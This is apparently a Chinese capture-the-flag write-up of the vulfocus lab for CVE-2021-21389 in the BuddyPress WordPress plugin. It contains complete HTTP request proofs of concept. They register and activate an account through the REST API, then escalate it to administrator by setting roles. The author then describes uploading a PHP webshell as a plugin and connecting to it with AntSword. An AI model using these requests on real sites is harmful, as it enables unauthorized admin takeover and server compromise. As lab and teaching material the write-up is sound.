vulfocus/wordpress_cve-2021-21389简洁版题解+漏洞复现

0x01 漏洞描述

1
2
3
4
5
6
7
 名称: vulfocus/wordpress_cve-2021-21389:latest

            描述: 

BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。


0x02 思路

注册绕过激活码,成果注册后登录

登录后改变自己的roles为admin–>漏洞发生点

以admin身份上传木马拿到flag

0x03 exp

1.先注册,回复页面找到激活码,然后拿到激活码发送请求包激活

image-20260414142138891

poc:

1
2
3
4
5
6
7
8
9
10
POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: 123.5...:10592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Referer: http://123.58.224.8:10592/register/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json; charset=UTF-8

{"user_login": "aaaa1111", "user_email": "a@1.com", "user_name": "aaaa1111", "password": "aaaa1111"}

2.激活(将激活码粘贴至url)

image-20260414142404669

poc:

1
2
3
4
5
6
7
8
9
10
PUT //wp-json/buddypress/v1/signup/activate/rPEQXD2Ml3i9sEeKpCUMjEere7IAhhdn HTTP/1.1
Host: 123...10592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Referer: http://123.58.224.8:10592/register/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json; charset=UTF-8

{"user_login": "aaaa1111", "user_email": "a@1.com", "user_name": "aaaa1111", "password": "aaaa1111"}

3.重新登陆账号密码,进入新的网页,先点击manage,再点击menber以及ban,拿到信息

1
http://123.58.224.8:10592/groups/create/step/group-details/

image-20260414142627864

复制cookie和X-WP-Nounce

image-20260414142922608

4.新的请求中粘贴信息,并修改roles为admin

image-20260414143253083

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /wp-json/buddypress/v1/members/me HTTP/1.1
Host: 123.5...10592
X-WP-Nonce: 054b46d285
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/json; charset=UTF-8
Cookie: wordpress_test_cookie=WP%20Cookie%20check; comment_author_255b0c20a0aa63e958df970dee81edbc=1; comment_author_email_255b0c20a0aa63e958df970dee81edbc=1%401.com; comment_author_url_255b0c20a0aa63e958df970dee81edbc=http%3A%2F%2Fbb.com; wordpress_logged_in_6added4e67aeefea26fd262ac40e789a=aaaa1111%7C1776320615%7CwHAdVSP9w1iim4QpazxgOTofTbc5Y8LPA8m1CQYOMmy%7C1f735edde34aaa9900c9e6f87e7d403436b14ab40e4f2d85aaea38c245cb737d; wp-settings-time-3=1776147911
X-HTTP-Method-Override: PUT
Content-Length: 10

{"roles": "administrator"}

5.重新打开网页,发现已经为admin身份,进行木马上传

image-20260414143318677

上传点:plugins里面的upload plugins

image-20260414145211000

上传木马后寻找木马文件所在位置,打开文件就能解析执行木马

1
http://123.58.224.8:42678/wp-content/uploads/

shell.php为我们的木马文件,打开后蚁剑链接

image-20260414145133213

image-20260414144908366

找到flag在tmp下

image-20260414145014614